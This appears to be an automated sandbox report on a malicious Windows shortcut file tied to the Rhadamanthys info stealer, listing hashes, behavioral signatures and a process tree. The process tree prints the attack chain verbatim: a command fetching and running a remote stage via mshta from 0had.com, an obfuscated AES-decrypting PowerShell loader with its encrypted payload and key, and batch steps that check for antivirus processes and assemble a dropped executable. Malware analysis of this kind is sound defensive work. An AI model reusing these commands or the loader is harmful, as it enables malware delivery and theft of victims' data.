Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
19-04-2024 01:55
Static task
static1
Behavioral task
behavioral1
Sample
c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
Resource
win10v2004-20240412-en
General
-
Target
c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
-
Size
1KB
-
MD5
b6c511480d3c76834e42b773836e76a9
-
SHA1
f135c8ece764465c4e9ba8fded937f0ad4a5ab79
-
SHA256
c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a
-
SHA512
f11d8780b11eee262276b0f16b65504b1f1e31ba6a25bbf7af3577079121a94f17ddcfb49fdbda08ec3c438bf1b2faa10b49281d29168f0d541cef089558c18d
Malware Config
Extracted
http://0had.com/stage
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
Cheers.pifdescription pid process target process PID 3644 created 2692 3644 Cheers.pif sihost.exe -
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exepowershell.exeflow pid process 26 3940 mshta.exe 36 4276 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exeDisabilityCharge.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation DisabilityCharge.exe -
Executes dropped EXE 2 IoCs
Processes:
DisabilityCharge.exeCheers.pifpid process 1232 DisabilityCharge.exe 3644 Cheers.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 644 3644 WerFault.exe Cheers.pif -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 2784 tasklist.exe 3576 tasklist.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000_Classes\Local Settings powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 42 IoCs
Processes:
powershell.exepowershell.exeCheers.pifAcroRd32.exedialer.exepid process 1544 powershell.exe 1544 powershell.exe 4276 powershell.exe 4276 powershell.exe 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 3644 Cheers.pif 3644 Cheers.pif 5116 dialer.exe 5116 dialer.exe 5116 dialer.exe 5116 dialer.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exetasklist.exetasklist.exedescription pid process Token: SeDebugPrivilege 1544 powershell.exe Token: SeDebugPrivilege 4276 powershell.exe Token: SeDebugPrivilege 2784 tasklist.exe Token: SeDebugPrivilege 3576 tasklist.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
AcroRd32.exeCheers.pifpid process 1392 AcroRd32.exe 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Cheers.pifpid process 3644 Cheers.pif 3644 Cheers.pif 3644 Cheers.pif -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
AcroRd32.exepid process 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe 1392 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exeforfiles.exepowershell.exemshta.exepowershell.exeDisabilityCharge.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 5092 wrote to memory of 4692 5092 cmd.exe forfiles.exe PID 5092 wrote to memory of 4692 5092 cmd.exe forfiles.exe PID 4692 wrote to memory of 1544 4692 forfiles.exe powershell.exe PID 4692 wrote to memory of 1544 4692 forfiles.exe powershell.exe PID 1544 wrote to memory of 3940 1544 powershell.exe mshta.exe PID 1544 wrote to memory of 3940 1544 powershell.exe mshta.exe PID 3940 wrote to memory of 4276 3940 mshta.exe powershell.exe PID 3940 wrote to memory of 4276 3940 mshta.exe powershell.exe PID 4276 wrote to memory of 1392 4276 powershell.exe AcroRd32.exe PID 4276 wrote to memory of 1392 4276 powershell.exe AcroRd32.exe PID 4276 wrote to memory of 1392 4276 powershell.exe AcroRd32.exe PID 4276 wrote to memory of 1232 4276 powershell.exe DisabilityCharge.exe PID 4276 wrote to memory of 1232 4276 powershell.exe DisabilityCharge.exe PID 4276 wrote to memory of 1232 4276 powershell.exe DisabilityCharge.exe PID 1232 wrote to memory of 1584 1232 DisabilityCharge.exe cmd.exe PID 1232 wrote to memory of 1584 1232 DisabilityCharge.exe cmd.exe PID 1232 wrote to memory of 1584 1232 DisabilityCharge.exe cmd.exe PID 1392 wrote to memory of 2668 1392 AcroRd32.exe RdrCEF.exe PID 1392 wrote to memory of 2668 1392 AcroRd32.exe RdrCEF.exe PID 1392 wrote to memory of 2668 1392 AcroRd32.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4292 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4868 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4868 2668 RdrCEF.exe RdrCEF.exe PID 2668 wrote to memory of 4868 2668 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://0had.com/stage"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. mshta http://0had.com/stage3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://0had.com/stage4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function GWVkC($OQIVk){return -split ($OQIVk -replace '..', '0x$& ')};$oUlJnFU = GWVkC('56A67CC90F7BC928FBB76DA2E224750D586965A7E0F8F557FF0856E894FEFF3BE7B23E6855B782A6630796E17202BD0E08D3E05FDBBA972A66EDD309CE61FAF317E38E20EF7B53C12E98E21C1172169AC870221DCF2CBFB2D28EABAEEE6AFE15DDC75D7F9A7EA6D4DCC11B60AD525062D432C1AF7F266A339581F8FE2577BCC208479F427C72D55A0009C9E5A454524C65816B86781571F5EAB763314745A0D5BBC269E7A28786F9F158D877A3785822976D61421897BA6E4015C3F00531CFE41809A1325D6C3B8CF2748C6913AC1B41D628D7D473F91707340A60B22D9994D94996EDCFEE33B67F9C118BCA16A64C4142D6A6ED45C2BF89E94D37D5B5A05D6CD6C044E1F5A7B39E2A676BD986430EFCAB1DEB19487A3C5B8692920814DA65EDBDEB811B0580D2634A520F0CB427693A05139D1791FBFF12BFA351AF662C53C02D3E6474D0884ADE26C0F04467CCC00864FD2A191A25501FD800885F045F307C5B5E31EC6AA3E51EB15BA71BFB647E97FA57C577BDBC2194AFEF6973F8A1618DB0AFCB5098A1659ECB2B8E0A9EA0C96549C0ACD148FF865B1F0EA60038B83E8031D1D52F3A852928554E936725C228252454C2422644121EBBF81D24926CFB00A71761AAE91ED9DF8D85F6F727C0D2983D845E9DFDAF0BF9286B28A0CD895C043907B6915FA7A8554C7CFBA3F408233D3F7F7922D02078F0A2E0AE94431CFB442F120BA1732E01F42A09AE837D10BEDD086E56BD70D0FBEBCEAE956284103044B68C0011B5F3B1E6529F4917947C8D0BC96836D1978317B140005D1C7047441719DE342E4662F38739895EBCB8375DCBC834A3D28AFE1A37E319CFA9894ED2B383627DEC489C20578355FC8196FE4164AC46D8DF7A20B62BAC13DB33906E7B22DC66483610E72C4FDD7F12AEC6A90A9F2E02802F04735D72234BAA5C52BCADB5575E9765C2DAE7C823087738C74006C2E1D72411A0F17F1C17AD882BA6F2A3C540A40E5A588AD370AD7643FF3A97CB0FBF388198B446C80213BD48767D581E363D9C3F081CDCA1F1891D30F4043BCC20E0713B31F0D72B18DA3B1E9688B94B7D68E3ABC4254D67FE62005219CA0673300BC22FB4F6C028D030838630239C508AD69B0D9D11E1DAED55BC0953D3D9232F60D9037915FABF10317D40FA5F2355394565BED8255AA7F2E9FEF0A9DEE5B6006F5439968F2CBC453F2ACCE7B287C6036B84ED4445D36A6B3481242E607AF0889ADF450C941CEED12A13C2162395BCDB9F6235416B983CCEBBD1289677DEE3A826B0BDC9DBB9EBFDE9828DABF50E4263BF2AAB34C67531AE59282CD4788143AEECD147543A8BAEBBD2F897086B5E6453A3EADE2E2427625B246CE8C1AF7FCB313EA4934F3B7948350E5398004C9471F553675D2C7B49364965B70120328686B775B8D1F05B2ABE4E816337195BCACDE8AB87B09D1AAAABCD7E08CA410CD3E5B4A0EDA996EEF343F17A0C2B755A103479D899A225EBFC9224558A8F2DB20D7E73A228C58F7F35C669B2719A06C068D8A9B7540F8BAACE9FB57064502FAA3C4CACAD9AA2E5C189F2F08723325BF8CD94C37AF87AA65F01D53020EE2F89AC43873D');$PpVdc = [System.Security.Cryptography.Aes]::Create();$PpVdc.Key = GWVkC('72417566717042666B7664427A694669');$PpVdc.IV = New-Object byte[] 16;$tRHLMuaf = $PpVdc.CreateDecryptor();$euSjzsAcc = $tRHLMuaf.TransformFinalBlock($oUlJnFU, 0, $oUlJnFU.Length);$XdUHAvYuR = [System.Text.Encoding]::Utf8.GetString($euSjzsAcc);$tRHLMuaf.Dispose();& $XdUHAvYuR.Substring(0,3) $XdUHAvYuR.Substring(3)5⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\SA160.pdf"6⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140437⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E245D665A16716F447C21EBF6C14233A --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:28⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=253E4F628EA0E2D8CF63BDBB81AE5A14 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=253E4F628EA0E2D8CF63BDBB81AE5A14 --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:18⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9EE6EBD83BD3CB4BE08FBB3D1F0D145A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9EE6EBD83BD3CB4BE08FBB3D1F0D145A --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:18⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=53EC0F4E1A36CEEAC524EBB74D839C5D --mojo-platform-channel-handle=2428 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:28⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=771B443710D1FD2BB21D02FCFC455B84 --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:28⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BDE6EBD58198AAEC906B8B75492765F8 --mojo-platform-channel-handle=2672 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:28⤵
-
C:\Users\Admin\AppData\Roaming\DisabilityCharge.exe"C:\Users\Admin\AppData\Roaming\DisabilityCharge.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c move Observed Observed.bat && Observed.bat7⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd /c md 51390758⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V "AndreaAccessibleOriginallyElizabeth" Ons8⤵
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 5139075\Cheers.pif + Software + Cap + Typing + Cingular + Dominican 5139075\Cheers.pif8⤵
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Customs + Placing + Anatomy + Church 5139075\M8⤵
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pif5139075\Cheers.pif 5139075\M8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 9169⤵
- Program crash
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.18⤵
- Runs ping.exe
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3644 -ip 36441⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessagesFilesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessagesFilesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessagesFilesize
64KB
MD5827c47e299f124cd3464368b5491c038
SHA1a52cb838b7412f428e5c3a5b95f476fc7a095079
SHA2568560f1c759dbf52dc28530a840f682ca27c1c44e36537d46fa4303149dd1db55
SHA5122f0a505ed78855a1470ef7f397a7b32c2e50cafc544b90c80d3fcad16ea05f5a64e1217f228c1f38a4f7f6407bb518c86557a04148b05abe721ec9f9996fa56c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
